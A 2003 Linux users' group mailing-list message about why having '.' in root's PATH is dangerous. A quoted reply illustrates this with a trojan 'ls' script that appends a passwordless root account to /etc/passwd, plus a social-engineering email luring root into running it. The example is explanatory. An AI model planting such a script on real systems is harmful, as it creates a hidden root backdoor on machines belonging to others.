[Gllug] What's so good about Debian?
FORSTER, David
david.forster at mfi.co.uk
Thu Oct 9 13:49:27 UTC 2003
Ah, OK, that makes perfect sense now! See what I mean by me being so used to
DOS/Windows :o(
Also... Does anyone know of a distro that's tailored for installation on
sharks with fricking laser beams on their heads? :oD
Sorry... very bad Dr Evil joke but I just couldn't resist it!
-----Original Message-----
From: Richard Jones [mailto:rich at annexia.org]
Sent: 09 October 2003 14:14
To: Greater London Linux Users Group
Subject: Re: [Gllug] What's so good about Debian?
On Thu, Oct 09, 2003 at 01:56:33PM +0100, Jack Bertram wrote:
> Actually, in DOS it doesn't need to be in your PATH, as the current
> directory is always checked. In Linux the current directory needs to be
> explicitly in the PATH.
And don't forget this is a security feature!
Having '.' in your $PATH (particularly if it's at the start of the
$PATH) is regarded as bad practice.
Let's say two users are using a machine, we'll call them root (who has
elevated priviledges) and dr_evil.
dr_evil creates a file in his home directory called 'ls':
cat > ls
#!/bin/sh
echo toot::0:0:root:/root:/bin/bash >> /etc/passwd
^D
chmod 0755 ls
Now he sends an email to root:
mail root
Subject: Strange thing in my directory
Hi root,
Come and have a look at this strange file or something in my
directory:
cd /home/dr_evil
ls
.. will show you the file.
Thanks, The doc.
^D
Now what happens if root has '.' at the beginning of his $PATH?
Rich.
--
Richard Jones. http://www.annexia.org/ http://freshmeat.net/users/rwmj
Merjis Ltd. http://www.merjis.com/ - all your business data are belong to
you.
MONOLITH is an advanced framework for writing web applications in C, easier
than using Perl & Java, much faster and smaller, reusable widget-based arch,
database-backed, discussion, chat, calendaring:
http://www.annexia.org/freeware/monolith/
--
Gllug mailing list - Gllug at linux.co.uk
http://list.ftech.net/mailman/listinfo/gllug
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: InterScan_Disclaimer.txt
URL: <http://mailman.lug.org.uk/pipermail/gllug/attachments/20031009/df7938b0/attachment.txt>
-------------- next part --------------
--
Gllug mailing list - Gllug at linux.co.uk
http://list.ftech.net/mailman/listinfo/gllug
More information about the GLLUG
mailing list